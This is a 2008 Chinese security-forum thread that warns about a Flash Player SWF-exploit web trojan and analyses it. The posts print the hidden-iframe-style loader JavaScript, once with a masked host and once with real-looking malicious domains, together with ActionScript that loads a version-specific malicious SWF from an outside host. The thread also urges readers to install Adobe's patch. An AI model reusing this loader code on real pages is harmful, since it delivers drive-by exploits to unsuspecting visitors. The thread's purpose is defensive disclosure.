返回列表 回复 发帖
andy

信息军队-列兵
1#
打印
tT
发表于 2008-5-31 15:46 | 只看该作者

FLASH网马悄然现身互联网

ps:建议大家尽快升级flash插件。

最近几天拦截到利用Adobe Flash Player SWF文件漏洞的网马,该网马通过网页加载一个正常的FLASH文件,再在那个FLASH文件里调用嵌入恶意构造的FLASH文件,这时会导致溢出,从而可能执行任意指令。以下为调用页内容:
该恶意FLASH部分内容如下:

[Copy to clipboard] [ - ]CODE:
<script>
window.onerror=function(){return true;}
function init(){window.status=”";}window.onload = init;
if(document.cookie.indexOf(”play=”)==-1){
var expires=new Date();
expires.setTime(expires.getTime()+24*60*60*1000);
document.cookie=”play=Yes;path=/;expires=”+expires.toGMTString();
if(navigator.userAgent.toLowerCase().indexOf(”msie”)>0)
{
document.write(’<object classid=”clsid:d27cdb6e-ae6d-11cf-96b8-444553540000″ codebase=”http://download.macromedia.com/p ... flash.cab#version=4,0,19,0″ width=”0″ height=”0″ align=”middle”>’);
document.write(’<param name=”allowScriptAccess” value=”sameDomain”/>’);
document.write(’<param name=”movie” value=”http://www.XXX.cn/flash/XX.swf”/>’);
document.write(’<param name=”quality” value=”high”/>’);
document.write(’<param name=”bgcolor” value=”#ffffff”/>’);
document.write(’<embed src=”http://www.XXX.cn/flash/XX.swf” mce_src=”http://www.XXX.cn/flash/XX.swf”/>’);
document.write(’</object>’);
}else
{document.write(”<EMBED src=http://www.XXX.cn/flash/XX.swf width=0 height=0>”);}}
</script> 以下为正常的FLASH文件使用的脚本:

// Action script…// [Action in Frame 1]
var flashVersion =/hxversion;
loadMovie(”http://www.XXX.cn/flash/” + flashVersion + “mal_swf.swf”, _root);
stop();
建议:

厂商补丁: Adobe
—–
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: http://www.adobe.com/go/getflash
收藏 分享 评分
回复 引用

订阅 TOP

andy

信息军队-列兵
2#
发表于 2008-5-31 15:47 | 只看该作者

对最新flash-0day网马分析!

js内查入flash,基本是为了绕过w3c页面的验证

<script>
window.onerror=function(){return true;}
function init(){window.status="";}window.onload = init;
if(document.cookie.indexOf("play=")==-1){
var expires=new Date();
expires.setTime(expires.getTime()+24*60*60*1000);
document.cookie="play=Yes;path=/;expires="+expires.toGMTString();
if(navigator.userAgent.toLowerCase().indexOf("msie")>0)
{
document.write('<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=4,0,19,0" width="0" height="0" align="middle">');
document.write('<param name="allowScriptAccess" value="sameDomain"/>');
document.write('<param name="movie" value="http://www.winshell.cn/flash/versionie.swf"/>');
document.write('<param name="quality" value="high"/>');
document.write('<param name="bgcolor" value="#ffffff"/>');
document.write('<embed src="http://www.winshell.cn/flash/versionie.swf"/>');
document.write('</object>');
}else
{document.write("<EMBED src=http://www.winshell.cn/flash/versionff.swf width=0 height=0>");}}
</script>
在那个swf里面有1句,估计是调用好多次才最后运行的...

var flashVersion = getVersion();
loadMovie("http://www.baiduqqsina.cn/flash/" + flashVersion + "ff.swf", _root);
stop ();
回复 引用

TOP

玲玲

信息军队-中尉
3#
发表于 2008-5-31 16:56 | 只看该作者
谢谢楼主,我去找找补丁去。
回复 引用

TOP

返回列表